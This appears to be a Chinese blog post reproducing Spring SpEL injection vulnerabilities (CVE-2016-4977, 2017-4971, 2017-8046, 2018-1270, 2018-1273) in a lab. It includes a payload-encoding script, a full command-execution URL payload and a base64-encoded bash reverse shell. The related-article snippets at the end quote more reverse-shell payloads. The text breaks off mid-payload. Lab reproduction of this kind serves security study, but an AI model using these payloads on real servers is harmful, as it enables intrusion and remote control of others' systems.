漏洞复现—Spring CVE-2016-4977/CVE-2017-4971/CVE-2017-8046/CVE-2018-1270/CVE-2018-1273

最新推荐文章于 2024-05-18 21:26:17 发布
最新推荐文章于 2024-05-18 21:26:17 发布
阅读量1k 收藏 1
点赞数 1
分类专栏: 渗透测试 文章标签: spring 安全漏洞 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45556536/article/details/110374017
版权

Spring CVE-2016-4977/CVE-2017-4971/CVE-2017-8046/CVE-2018-1270/CVE-2018-1273

基础知识

  Spring框架是由于软件开发的复杂性而创建的。Spring使用的是基本的JavaBean来完成以前只可能由EJB完成的事情。然而,Spring的用途不仅仅限于服务器端的开发。从简单性、可测试性和松耦合性角度而言,绝大部分Java应用都可以从Spring中受益。

漏洞原理

  CVE-2016-4977:Spring Security OAuth 是为 Spring 框架提供安全认证支持的一个模块。在其使用 whitelabel views 来处理错误时,由于使用了Springs Expression Language (SpEL),攻击者在被授权的情况下可以通过构造恶意参数来远程执行命令。

  CVE-2017-4971:Spring WebFlow 是一个适用于开发基于流程的应用程序的框架(如购物逻辑),可以将流程的定义和实现流程行为的类和视图分离开来。在其 2.4.x 版本中,如果我们控制了数据绑定时的field,将导致一个SpEL表达式注入漏洞,最终造成任意命令执行。

  CVE-2017-8046:Spring Data REST是一个构建在Spring Data之上,为了帮助开发者更加容易地开发REST风格的Web服务。在REST API的Patch方法中【实现RFC6902】(https://tools.ietf.org/html/rfc6902)),path的值被传入setValue,导致执行了SpEL表达式,触发远程命令执行漏洞。

  CVE-2018-1270:spring messaging是基于sockjs(可以理解为一个通信协议),而sockjs适配多种浏览器:现代浏览器中使用websocket通信,老式浏览器中使用ajax通信。
连接后端服务器的流程,可以理解为: 用STOMP协议将数据组合成一个文本流,再用sockjs协议发送文本流,sockjs会选择一个合适的通道:websocket或xhr(http),与后端通信,使用http来复现漏洞,称之为“降维打击”。

  CVE-2018-1273:Spring Data是一个用于简化数据库访问,并支持云服务的开源框架,Spring Data Commons是Spring Data下所有子项目共享的基础框架。Spring Data Commons 在2.0.5及以前版本中,存在一处SpEL表达式注入漏洞,攻击者可以注入恶意SpEL表达式以执行任意命令。

涉及版本

  CVE-2016-4977

  • Spring Security OAuth 2.3到2.3.2
  • Spring Security OAuth 2.2到2.2.1
  • Spring Security OAuth 2.1到2.1.1
  • Spring Security OAuth 2.0到2.0.14

  CVE-2017-4971

  • Spring WebFlow 2.4.0 - 2.4.4
  • 较旧的不受支持的版本也会受到影响

  CVE-2017-8046

  • Spring Data REST versions < 2.5.12, 2.6.7, 3.0 RC3
  • Spring Boot version < 2.0.0M4
  • Spring Data release trains < Kay-RC3

  CVE-2018-1270

  • Spring Framework 5.0 to 5.0.4.
  • Spring Framework 4.3 to 4.3.14
  • 已不支持的旧版本仍然受影响

  CVE-2018-1273

  • Spring Data Commons 1.13至1.13.10(Ingalls SR10)
  • Spring Data REST 2.6至2.6.10(Ingalls SR10)
  • Spring Data Commons 2.0至2.0.5(Kay SR5)
  • Spring Data REST 3.0至3.0.5(Kay SR5)
  • 较旧的不受支持的版本也会受到影响

漏洞复现

CVE-2016-4977

启动环境:

http://your-ip:8080/oauth/authorize?response_type=${
   233*233}&client_id=acme&scope=openid&redirect_uri=http://test

首先需要填写用户名和密码,我们这里填入admin:admin,发现返回结果为${}中的乘法被执行:
在这里插入图片描述

(1)创建文件

使用靶场自带的脚本:

// poc.py
#!/usr/bin/env python

message = input('Enter message to encode:')

poc = '${T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(%s)' % ord(message[0])

for ch in message[1:]:
   poc += '.concat(T(java.lang.Character).toString(%s))' % ord(ch) 

poc += ')}'

执行脚本,命令如下:

// 命令
python poc.py 
Enter message to encode:touch /tmp/111

执行的记录如下:
在这里插入图片描述
poc如下:

// An highlighted block
/oauth/authorize?response_type=${
   T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(116).concat(T(java.lang.Character).toString(111)).concat(T(java.lang.Character).toString(117)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(104)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(109)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(49)).concat(T(java.lang.Character).toString(49)).concat(T(java.lang.Character).toString(49)))}&client_id=acme&scope=openid&redirect_uri=http://test

得到poc拼接到上面的${}位置,即可执行,burp suite记录如下:

在这里插入图片描述
成功执行:
在这里插入图片描述
(1)反弹

编码反弹语句(不编码的试了没有反弹成功):

bash -i >& /dev/tcp/目标 IP/2222 0>&1
// 编码后
bash -c {
   echo,YmFzaCAtaSA+JiAvZGV2L3RjcC84MS42OC42Ny4xMjUvMjIyMiAwPiYx}|{
   base64,-d}|{
   bash,-i}

在线编码工具:

http://www.jackson-t.ca/runtime-exec-payloads.html

在这里插入图片描述
将编码后的反弹命令再编码一下,得到攻击的poc
在这里插入图片描述
执行命令:

// GET包访问路径
/oauth/authorize?response_type=${
   T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(98).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(104)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(45)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(123)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(104)).concat(T(java.lang.Character).toString(111)).concat(T(java.lang.Character)
最低0.47元/天 解锁文章
「已注销」
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
spring Security OAuth2 远程命令执行漏洞CVE-2016-4977复现-kali
qq_41760817的博客
12-04 1249
spring Security OAuth2 远程命令执行漏洞CVE-2016-4977复现
cve-2016-4977(spring-security-oauth) RCE漏洞复现
m0_58596609的博客
04-21 5035
cve-2016-4977(spring-security-oauth) RCE漏洞复现
spring:CVE-2018:1273
最新发布
weixin_69670995的博客
05-18 405
使用浏览器访问users,并输入随便东西。在kali上使用vim新建测试txt文件。使用dirsearch工具进行目录扫描。使用python3开启临时http。修改payload,让靶机执行木马。修改payload,提升木马权限。发到重发器,并修改post传参。返回200,上传txt文件成功。修改paylaod,上传木马。执行成功,返回靶机shell。使用burp抓包,点击注册。返回200,上传成功。
Spring Data Commons远程命令执行漏洞_CVE-2018-1273(反序列Runtime方法)
weixin_42786460的博客
09-16 373
Spring Data Commons远程命令执行漏洞_CVE-2018-1273(反序列Runtime方法)
Spring Data Commons 远程命令执行漏洞CVE-2018-1273
黑白的博客
12-20 2563
声明 好好学习,天天向上 漏洞描述 Spring Data是一个用于简化数据库访问,并支持云服务的开源框架,Spring Data Commons是Spring Data下所有子项目共享的基础框架。Spring Data Commons 在2.0.5及以前版本中,存在一处SpEL表达式注入漏洞,攻击者可以注入恶意SpEL表达式以执行任意命令。 影响范围 · Spring Data Commons 1.13 - 1.13.10 (Ingalls SR10) · Spring Data REST 2.6 - 2
漏洞复现 | CVE-2018-1273 Spring Data Commons 远程命令执行
weixin_42282189的博客
09-15 1737
作者: 墨阳 免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责。 0x00 前言 Spring Data是一个用于简化数据库访问,并支持云服务的开源框架,Spring Data Commons是Spring Data下所有子项目共享的基础框架。Spring Data Commons 在2.0.5及以前版本中,存在一处SpEL表达式注入漏洞,攻击者可以注入恶意SpEL表达式以执行任意命令。 受影响版本: Spring Data Commons 1.13 – 1.13.10 (Inga.
Spring Security OAuth2 远程命令执行漏洞CVE-2016-4977
黑白的博客
12-20 1753
声明 好好学习,天天向上 漏洞描述 Spring Security OAuth 是为 Spring 框架提供安全认证支持的一个模块。在其使用 whitelabel views 来处理错误时,由于使用了Springs Expression Language (SpEL),攻击者在被授权的情况下可以通过构造恶意参数来远程执行命令。 影响范围 2.0.0-2.0.9 1.0.0-1.0.5 复现过程 这里使用2.0.8版本 使用vulhub cd /app/vulhub-master/spring/CVE-201
Windows Server CVE-2016-2183 SSL/TLS协议信息泄露漏洞修复脚本
10-06
Windows Server 合规漏洞修复,修复Windows Server CVE-2016-2183 SSL/TLS协议信息泄露漏洞修复脚本,基于Windows PowerShell, 兼容Windows Server 2016/2019,防止Sweet32 生日攻击
OPENSSH漏洞(CVE-2020-15778 CVE-2018-15473、CVE-2018-15919)修补文件命令
03-31
本篇将详细讨论如何修补OpenSSH中的几个已知漏洞,包括CVE-2020-15778、CVE-2018-15473、CVE-2018-15919。 首先,让我们了解这些特定的漏洞: 1. CVE-2020-15778:这是一个与OpenSSH密钥协商过程相关的漏洞,可能...
vulhub-CVE-2016-4977-SpringSecurityOauth RCE复现记录
weixin_42513429的博客
08-19 249
https://www.cnblogs.com/litlife/p/10380701.html https://blog.csdn.net/qq_45300786/article/details/119249422 参考别人的博客,对CVE-2016-4977进行复现 Spring Security OAuth SpEL表达式注入 影响范围(复制来的): Spring Security OAuth 1.0.0到1.0.5 Spring Security OAuth 2.0.0到2.0.9 Spring .
CVE-2017-4971-Spring Web Flow RCE漏洞复现
m0_58596609的博客
04-21 2596
CVE-2017-4971-Spring Web Flow RCE漏洞复现
Spring Web Flow远程代码执行漏洞复现(CVE-2017-4971)
wutiangui的博客
09-10 255
1.MvcViewFactoryCreator对象的useSpringBeanBinding参数需要设置为false(默认值)2. flow view对象中设置BinderConfiguration对象为空。影响版本:Spring Web Flow 2.4.0 ~ 2.4.4。将其拼接在csrf后面,记得IP和端口改成自己攻击机的。开启burp抓包,拦截,同时点击confirm。注意出现302时表示重定向了,重新再来就行。点击下面的链接,使用左边默认的账号登录。
Spring框架漏洞复现大杂烩!!!
热门推荐
SoulCat
02-27 2万+
Spring框架漏洞复现大杂烩!!! 寻了半生的春天 你一笑 便是了 总体概述: Spring是一个开源框架,核心是控制反转(IoC)和面向切面(AOP)。简单来说,Spring是一个分层的JavaSE/EE full-stack(一站式) 轻量级开源框架。简单说就是创建对象由以前的程序员自己new 构造方法来调用,变成交由Spring来创建对象 。类比Struts 2框架绝大部分的安全漏洞...
Spring Data REST 远程代码执行漏洞CVE-2017-8046)分析与复现
美团技术团队
09-29 4836
前言 2009年9月Spring 3.0 RC1发布后,Spring就引入了SpEL(Spring Expression Language)。对于开发者而言,引入新的工具显然是令人兴奋的,但是对于运维人员,也许是噩耗的开始。类比Struts 2框架,会发现绝大部分的安全漏洞都和ognl脱不了干系。尤其是远程命令执行漏洞,占据了多少甲方乙方工程师的夜晚/周末,这导致Struts 2越...
Spring-Messaging远程代码执行漏洞CVE-2018-1270
m0_65150886的博客
12-27 1259
'selector': 'T(java.lang.Runtime).getRuntime().exec(new String[]{"/bin/bash","-c","exec 5/dev/tcp/你的kaliIP/kali监听端口;sockjs = SockJS('http://你的靶机IP:8080/gs-guide-websocket')
spring CVE-2017-4971漏洞复现
shangMD01的博客
03-17 3765
搭建漏洞环境: cd vulhub/spring/CVE-2017-4971 docker-compose up -d 查看容器是否开启: 在浏览器打开网站: 填写合法信息: 此处存在命令执行,可反弹shell 使用如下反弹shell的Payload: _eventId_confirm=&_csrf=57033da7-4538-42ec-9933-e12ac3e97db5&_(new+java.lang.ProcessBuilder("bash","-.

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值